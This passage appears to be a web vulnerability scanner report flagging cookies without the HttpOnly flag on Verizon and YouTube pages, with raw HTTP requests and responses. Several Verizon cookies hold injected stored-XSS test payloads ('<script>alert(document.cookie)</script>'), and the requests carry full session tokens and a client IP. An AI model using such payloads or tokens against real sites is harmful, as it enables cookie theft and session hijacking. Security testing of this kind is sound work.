...[SNIP]...

10.116. http://www.verizonbusiness.com/about/ipinnovation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/about/ipinnovation/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262296|VP%3d3|RMC%3dxg|LP%3den%00568ab"%3b816280f424; expires=Mon, 05 Sep 2016 03:22:00 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ipinnovation/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.1.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "2cc42523912f8dd3e6e8f7da028c3456"
Last-Modified: Mon, 05 Sep 2011 22:18:16 GMT
Vary: *
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 28468
Date: Mon, 05 Sep 2011 22:18:17 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262296|VP%3d3|RMC%3dxg|LP%3den%00568ab"%3b816280f424; expires=Mon, 05 Sep 2016 03:22:00 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:18:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

10.117. http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/us/Products/networking/internet/ipv6/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263423|VP%3d60|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:47 GMT; domain=www.verizonbusiness.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/Products/networking/internet/ipv6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "7ccf9e359df2b6054bf13169efbf9ab9"
Last-Modified: Mon, 05 Sep 2011 22:37:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:37:04 GMT
Content-Length: 27349
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263423|VP%3d60|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:47 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:37:04 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.118. http://www.verizonwireless.com/b2c/store/controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewStoreIndex HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ZIPCODE=10010; CITY=New York; STATE=NY

Response

10.119. http://www.verizonwireless.com/b2c/vzwfly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/vzwfly

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/
ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
CITY=New York; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Content-Length: 173
Cache-Control: max-age=0
Origin: http://www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

query=item%3DphoneFirst%26action%3DviewStoreIndex%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=10010&rememberMyZip=&state=&prevstate=&change=&filter=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 05 Sep 2011 22:20:58 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/
Set-Cookie: ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
Set-Cookie: CITY=New York; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
Set-Cookie: STATE=NY; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 387

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

10.120. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO=797cb795181fd5a70728e4cd351d4ac7cwsAAAAzVVMyF3tqTmVPFQ==; path=/; domain=.youtube.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:37:09 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=797cb795181fd5a70728e4cd351d4ac7cwsAAAAzVVMyF3tqTmVPFQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

10.121. http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 248796
Expires: Mon, 05 Sep 2011 22:37:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:24 GMT
Connection: close
Set-Cookie: ContextInfo_Partner=VZO; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
Verizon | F
...[SNIP]...

10.122. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; path=/
ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV
Content-Length: 253
Cache-Control: max-age=0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; CP=null*

__VIEWSTATE=%2FwEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ%3D&_ctl00_Template_Wrapper_Begin1_HdnPageName=&_ctl00_Template_Wrapper_Begin1_HdnPageTitle=&_ctl00_Templat
...[SNIP]...

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8418
Date: Mon, 05 Sep 2011 22:24:29 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:29 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="inf
...[SNIP]...

10.123. http://www22.verizon.com/content/ContactUs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/ContactUs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:38:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/ContactUs/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 238563
Expires: Mon, 05 Sep 2011 22:38:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:27 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:38:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
Verizon | R
...[SNIP]...

10.124. http://www22.verizon.com/content/commontemplates/validlogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/commontemplates/validlogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:29:10 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/commontemplates/validlogin.aspx HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 638
Expires: Mon, 05 Sep 2011 22:24:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:10 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:29:10 GMT; path=/content/; domain=verizon.com

var aType=new Array("retailconsumer","retailgeneralbiz","eservices");var aLOB=new Array("myvz","myvzquickpay","concos","rescos","smbcos","retailgenbiz","retailconsumer","callassistant");var ckType='';
...[SNIP]...

10.125. http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/Intermediate.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:24:23 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/Intermediate.aspx HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
